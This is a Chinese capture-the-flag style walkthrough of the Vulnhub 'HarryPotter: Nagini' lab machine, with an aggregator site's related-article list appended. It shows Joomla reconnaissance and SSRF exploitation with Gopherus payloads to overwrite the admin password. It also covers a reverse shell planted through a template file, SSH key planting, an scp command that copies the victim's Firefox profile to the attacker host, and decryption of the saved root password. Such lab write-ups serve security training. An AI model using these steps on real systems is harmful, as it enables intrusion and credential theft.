Vulnhub系列靶机---HarryPotter-Nagini-哈利波特系列靶机-2

news2025/3/3 5:42:20

文章目录

      • 信息收集
        • 主机发现
        • 端口扫描
        • gobuster目录扫描
        • dirsearch扫描
        • joomscan扫描
        • 实现http3访问
      • 漏洞利用
        • Gopherus工具
        • GetShell
        • 提权
          • firefox_decrypt工具
      • 总结

靶机文档:HarryPotter: Nagini

下载地址:Download (Mirror)

image-20230910114323063

信息收集

主机发现

在这里插入图片描述

端口扫描

image-20230910114911394
访问80端口
在这里插入图片描述

gobuster目录扫描

gobuster dir -u http://192.168.80.144 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

image-20230910115418176

dirsearch扫描

dirsearch -u 192.168.80.144

在这里插入图片描述

/joomla

image-20230910115942417

/note.txt

image-20230910120320170

需要我们用http3来访问https://quic.nagini.hogwarts

/joomla/administrator后台

image-20230910121152328

joomscan扫描

Joomla是一款知名的PHP语言编写的CMS系统。很多网站都使用Joomla!搭建而成。Kali Linux集成了一款Joomla!网站扫描工具joomscan。该工具不仅可以对网站所使用的Joomla!版本、防火墙进行探测,还可以探测已知的漏洞,并生成文本或网页形式的报告

使用这个扫描器之前需要先apt-get install joomscan下载安装

 joomscan --url http://192.168.80.144/joomla

在这里插入图片描述

image-20230910123039308

/joomla/administrator这个路径上面已经看过了,就是个后台管理页面,不知道用户名,也不知道密码

看看这个configuration.php.bak里面内容把

 wget  http://192.168.80.144/joomla/configuration.php.bak

在这里插入图片描述

 cat configuration.php.bak

发现了数据库的信息,用户名:goblin,没有密码

在这里插入图片描述

实现http3访问

项目地址:https://github.com/cloudflare/quiche

sduo apt install cargo             #安装cargo组件
sudo apt install cmake             #安装cmake组件
sudo apt purge rustc               #卸载系统自带的rustc
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh   #重新安装最新版本的rustc

kali安装rust开发环境

image-20230910131409540

image-20230910131504927

image-20230910132016643

source $HOME/.cargo/env       #执行环境变量

image-20230910132054242

rustup --version
rustc --version
cargo --version

在这里插入图片描述

sudo apt-get install git           #安装git

git clone https://github.com/cloudflare/quiche.git   #下载quiche

在这里插入图片描述

cargo build --examples        #运行cargo默认实例的文件
cargo test                    #检查前面所有安装命令
cd  /quiche/target/debug/examples
./http3-client https://192.168.56.144     #利用http3的客户端去访问目标靶机

实在弄不出来,耽误时间!一直报错


最后用http3-client访问https://quic.nagini.hogwarts这个地址得到有用信息:/internalResourceFeTcher.php

访问后发现是一个搜索框的样子

image-20230910135201871

在这里插入图片描述

输入地址 后,页面发生了跳转,说明存在SSRF漏洞

image-20230910135335857

image-20230910135526412


漏洞利用

Gopherus工具

使用Gopherus工具工具生成payload:

python2 gopherus.py --exploit mysql
goblin  #输入数据库名
show databases;  #查询数据库 

image-20230910135726948

得到gopher连接,直接放到浏览器?url=后面,我的会报错,所以我给他进行在二次编码,编码之后刚开始放在?url=后面可能内反应,多刷新几次页面,就能看到 结果了

image-20230910140235652

得到数据库名joomla

image-20230910140129133

重复上面的操作,获取表名

在这里插入图片描述

image-20230910140553807

获取数据

image-20230910140701358

image-20230910141129255

用户名:site_admin
加密后的密文:<$2y$10$cmQ.akn2au104AhR4.YJBOC5W13gyV21D/bkoTmbWWqFWjzEW7vay 

密文解不出来,尝试生成 一个密文,修改数据库里的数据

 echo -n "JayChou" | md5sum

image-20230910141310895

5cfe4dfc7664b61eff2325db0caabd27

使用工具修改site_admin用户的密码

在这里插入图片描述

image-20230910141809144

密码修改成功!,可以使用site_admin:JayChou登陆管理员后台

image-20230910142515147

GetShell

对于这类的框架,有个常用的方法就是利用他们的主题,对主题中的文件进行修改,然后访问主题文件,本地监听,即可反弹shell

image-20230910142717728

image-20230910142920615

image-20230910142940766

使用kali自带的php-reverse-shell.php

位置在:/usr/share/webshells/php/php-reverse-shell.php

修改Protostar里的index.php,将php-reverse-shell.php内容复制到index.php里面,然后Save保存

image-20230910143737042

kali监听1234端口

浏览器访问http://192.168.80.144/joomla/templates/protostar/index.php,触发反弹shell

image-20230910144112782

成功拿到shell,但不是交互的shell

提权

python3 -c "import pty;pty.spawn('/bin/bash')"

在网站根目录下发现第一个魂器flag

image-20230910144830131

使用base64解码后,翻译

在这里插入图片描述

来到/home目录下,有两个用户,在hermoine目录下发现第二个魂器flag,但是没有权限查看

在这里插入图片描述

image-20230910145319650

在 看看snape用户家里有啥东西

image-20230910145411715

解码后得到

echo "TG92ZUBsaWxseQ==" | base64 --decode

image-20230910145558492

切换到snape用户

image-20230910145857820

查看 有什么能用的

image-20230910150114006

image-20230910150102712

看到在hermoine用户下存在一个su_cp文件,我们cd到该目录下看看

image-20230910153702319

使用ssh-keygen生成公钥

image-20230910155918217

image-20230910154211947

将生成的公钥上传到斯内普下

在这里插入图片描述

来到snape家目录下

id_rsa.pub 重命名为 authorized_keys

mv id_rsa.pub authorized_keys

并且赋予执行权限

image-20230910155104619

使用kali机器连接hermoine用户的时候还是让输入 密码,由于在于**ahthorized_keys文件权限不得高于700**

问题解决来源:https://blog.csdn.net/qq_39320261/article/details/128342057

然后重新给authorized_keys赋权限

image-20230910160815066

现在可以免密登录赫敏了

在这里插入图片描述

切换到家目录下 ,查看第二个魂器flag

image-20230910160928830

解码

image-20230910161330669

image-20230910161406914在他的家目录下发现有一个.mozilla目录

.mozilla这个目录是Linux在使用火狐浏览器的时候,生成的,里面存在一些配置信息,更甚至有密码

firefox_decrypt工具

发现了.mozilla目录里面有个firefox 使用工具:firefox_decrypt

image-20230910161704895

先将.mozilla目录复制到攻击机kali里面

scp -r .mozilla/  kali@192.168.80.141:/home/kali/tmp

image-20230910162451895

工具下载

git  clone https://github.com/unode/firefox_decrypt.git

image-20230910162106452

工具使用

python firefox_decrypt.py ../../tmp/.mozilla/firefox

image-20230910162714704

root:@Alohomora#123

image-20230910162938937

总结

  • 实现http3的访问 【弄不出来】

  • SSRF工具利用,以及md5sum生成md5加密值

  • base64 --decode 的使用

  • SSH公钥写入以及scp命令

  • firefox_decrypt工具

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/996384.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

生成克隆钓鱼网站与对win7进行后渗透操作

目录 目录 前言 系列文章列表 思维导图 1&#xff0c;实验涉及复现环境 2&#xff0c;CS的介绍 2.1,CS的简介 2.2,CS的主要功能 3&#xff0c;CS的安装 3.1,将cobalt_strike_4.5文件夹放到kali中 3.1,放入过程中的注意事项 3.2,如图所示 4,配置工具 4.1,进入c…

Kafka3.0.0版本——消费者(Sticky分区分配策略以及再平衡)

目录 一、Sticky分区分配策略原理二、Sticky分区分配策略 示例需求三、Sticky分区分配策略代码案例3.1、创建带有7个分区的sevenTopic主题3.2、创建三个消费者 组成 消费者组3.3、创建生产者3.4、测试3.5、Sticky分区分配策略代码案例说明 四、Sticky分区分配再平衡案例4.1、停…

机器人抓取检测技术的研究现状

1.分析法 图 1 为分析法在进行抓取检测时所采用的 一般策略[3] [3]Sahbani A, El-Khoury S, Bidaud P. An overview of 3D object grasp synthesis algorithms[J]. Robotics and Autonomous Systems, 2012, 60(3): 326-336. 首先,基于环境限制和机械手与物体模 型进行抓取检…

算法宝典——Java版本(持续更新)

目录 一、链表的算法题&#xff08;目前9道&#xff09; 1. 移除链表元素&#xff08;思路&#xff1a;前后指针&#xff09; 2. 反转一个单链表 &#xff08;思路&#xff1a;头插法&#xff09; 3. 链表的中间结点&#xff08;思路&#xff1a;快慢指针&#xff09; 4. 链…

衷心祝福“好教师”节日快乐

在2023年教师节的今天&#xff0c;本“人民体验官”推广人民日报官方微博文化产品《张桂梅说教师这个职业有苦有幸福》。 图&#xff1a;来源“人民体验官”推广平台 人民微博简述道&#xff1a;“今天&#xff0c;张桂梅祝全国老师们节日快乐。” 张桂梅说&#xff1a;“教师…

图像的几何变换(缩放、平移、旋转)

图像的几何变换 学习目标 掌握图像的缩放、平移、旋转等了解数字图像的仿射变换和透射变换 1 图像的缩放 缩放是对图像的大小进行调整&#xff0c;即 使图像放大或缩小 cv2.resize(src,dsize,fx0,fy0,interpolationcv2.INTER_LINEAR) 参数&#xff1a; src :输入图像dsize…

机构企业学员培训知识付费小程序开源版开发

机构企业学员培训知识付费小程序开源版开发 用户注册与登录&#xff1a;提供用户注册和登录功能&#xff0c;以便用户能够访问和使用小程序。个人信息管理&#xff1a;允许用户管理个人资料&#xff0c;包括修改个人信息和上传个人头像。课程浏览&#xff1a;提供课程列表&…

[技术讨论]讨论问题的两个基本原则——17年前的文字仍然有效

前两天又有人找我讨论问题&#xff0c;而且是他自己的项目&#xff0c;内容与我没有任何关系&#xff0c;他说的&#xff0c;却是讨论。 其实就是想来做咨询&#xff0c;又不想付费。 今天看到了十七年前写的这篇文字&#xff0c;就重发一下了&#xff0c;当然有少量文字修订&a…

【Java并发】聊聊ReentrantReadWriteLock锁降级和StampedLock邮戳锁

面试题 1.你说你用过读写锁&#xff0c;锁饥饿问题是什么&#xff1f; 2.有没有比读写锁更快的锁&#xff1f; 3.StampedLock知道吗?(邮戳锁/票据锁) 4.ReentrantReadWriteLock有锁降级机制策略你知道吗&#xff1f; 在并发编程领域&#xff0c;有多线程进行提升整体性能&…

c++ - 抽象类 和 多态当中一些问题

抽象类 纯虚函数 在虚函数的后面写上 0 &#xff0c;则这个函数为纯虚函数。 class A { public:virtual void func() 0; }; 纯虚函数不需要写函数的定义&#xff0c;他有类似声明一样的结构。 抽象类概念 我们把具有纯虚函数的类&#xff0c;叫做抽象类。 所谓抽象就是&a…

124个Python案例,完整源代码!

大家好&#xff0c;我是涛哥。 很多小伙伴为了掌握爬虫这门技术&#xff0c;投入了大量的时间和精力。他们在深夜里独自码字&#xff0c;他们在周末的时候熟读代码&#xff0c; 但独自学习&#xff0c;没有朋友的陪伴和指导&#xff0c;学习的过程就像是在一条无尽的道路上徘…

【多线程】wait 、notify 和 notifyAll 讲解

wait 、notify 和 notifyAll 讲解 一. wait二. wait 和 sleep 的对比三. notify四. notifyAll五. notify 与 notifyAll 的原理 由于线程之间是抢占式执行的, 因此线程之间执行的先后顺序难以预知. 但是实际开发中有时候我们希望合理的协调多个线程之间的执行先后顺序. 完成这个…

军队状态出现的六种结果,是将帅的过失

军队状态会出现六种坏结果&#xff0c;是将帅的过失 【安志强趣讲《孙子兵法》第35讲】 【原文】 故兵有走者&#xff0c;有弛者&#xff0c;有陷者&#xff0c;有崩者&#xff0c;有乱者&#xff0c;有北者。凡此六者&#xff0c;非天之灾&#xff0c;将之过也。 【趣讲白话】…

【代码分析】初学解惑C++:函数适配器

文章目录 前置知识 运算符的重载“&#xff08;&#xff09;”一、函数适配器是什么&#xff1f;由遇到的问题引出适配器模式类模式对象模式例1例2例3例4二、实现函数适配器1.定义函数2.定义函数适配器3.使用函数适配器 三、带模板的函数适配器1、自定义unary_function2、改写带…

alibaba按关键字搜索商品 API

为了进行电商平台 的API开发&#xff0c;首先我们需要做下面几件事情。 1&#xff09;开发者注册一个账号 2&#xff09;然后为每个alibaba应用注册一个应用程序键&#xff08;App Key) 。 3&#xff09;下载alibaba API的SDK并掌握基本的API基础知识和调用 4&#xff09;利…

vue3中,调接口,渲染数据

1. 封装接口文档 // src/apis/xxx.js中 // 1. 导入 封装的axios实例 import request from /utils/http // 2. 封装接口 --获取轮播图数据 export const getBannerAPI (params {})>{// 传默认参数->&#xff08;传参 默认参数&#xff09;const { distributionSite…

Reids的安装使用

Windows 版本的 Redis 是 Microsoft 的开源部门提供的 Redis. 这个版本的 Redis 适合开发人员学习使用&#xff0c;生产环境中使用 Linux 系统上的 Redis, 这里讲解了这两种的安装和下载。按照你们需要的liunx 或window步骤来 就可以了&#xff08;也可以留言&#xff0c;后面看…

c++ explicit关键作用

explicit 概念引入1.explicit 介绍1.1 显示调用和隐式调用1.2 explicit意义 概念引入 构造函数不仅可以构造并初始化对象&#xff0c;对于具有单个参数或者除第一个参数无默认值其余均有默认值的构造函数&#xff0c;还具有类型转换作用。 而explicit关键字&#xff0c;恰恰可…

useGetState自定义hooks解决useState 异步回调获取不到最新值

setState 的两种传参方式 1、直接传入新值 setState(options); const [state, setState] useState(0); setState(state 1); 2、传入回调函数 setState(callBack); const [state, setState] useState(0); setState((prevState) > prevState 1); // prevState 是改变之…

BUUCTF reverse2 1

使用die查看文件信息&#xff0c;发现是ELF64位程序&#xff0c; 也就是说这是linux上的运行程序 再linux上运行 使用IDA64打开文件 F5 反编译 可以看到这里和flag进行对比 点击flag 点击这个7Bh&#xff0c;然后按r flag出来了 {hacking_for_fun}加上flag头提交 flag{h…